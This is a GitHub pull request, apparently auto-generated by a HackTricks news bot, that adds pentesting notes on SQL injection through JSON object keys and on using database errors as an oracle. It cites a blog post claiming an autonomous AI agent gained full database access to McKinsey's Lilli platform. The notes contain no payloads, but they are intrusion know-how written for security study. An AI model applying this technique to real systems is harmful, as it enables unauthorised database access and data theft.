Open
Conversation
Collaborator
Author
🔗 Additional ContextOriginal Blog Post: https://codewall.ai/blog/how-we-hacked-mckinseys-ai-platform Content Categories: Based on the analysis, this content was categorized under "Pentesting Web -> SQL Injection (add subsection on SQLi via JSON keys / identifier injection; include notes on error-based oracle exploitation and why scanners miss key-fuzzing)". Repository Maintenance:
Review Notes:
Bot Version: HackTricks News Bot v1.0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
🤖 Automated Content Update
This PR was automatically generated by the HackTricks News Bot based on a technical blog post.
📝 Source Information
🎯 Content Summary
Title/Context
McKinsey’s internal AI platform “Lilli” (launched 2023) provides chat, document analysis, and RAG/search across 100,000+ internal documents for 43,000+ employees (adopted by 70%+; 500,000+ prompts/month). The post claims an autonomous offensive agent (no credentials, no insider knowledge, no human-in-the-loop) achieved full read and write access to the production database within ~2 hours using only the exposed attac...
🔧 Technical Details
SQLi via JSON key/identifier injection
If an API builds SQL dynamically using user-controlled JSON object keys (field names) and concatenates them into the query string, parameterizing only the values does not prevent SQL injection. Attackers can place SQL fragments in the JSON key positions (identifier injection). This class of SQLi is commonly missed by scanners that only fuzz values, so testing must include fuzzing keys/field names and any server-side mapping that turns JSON object properties into SQL identifiers.
Error-based feedback loop to derive “query shape”
When the backend returns database errors that reflect attacker-controlled input (including JSON keys), those errors act as an oracle. An attacker can iterate: inject malformed syntax → read the error → infer where the input lands in SQL → refine payload. Repeating this across multiple requests can transition from blind probing to valid injected SQL and reliable data extraction.
<br/...
🤖 Agent Actions
Summary:
Added a new subsection on SQLi via JSON keys/identifier injection, error-based oracle usage, and why scanners miss key-fuzzing.
Added the blog URL to the References section.
Files updated:
src/pentesting-web/sql-injection/README.mdTests:
If you want tweaks to wording or placement, tell me where you’d like it adjusted.
This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.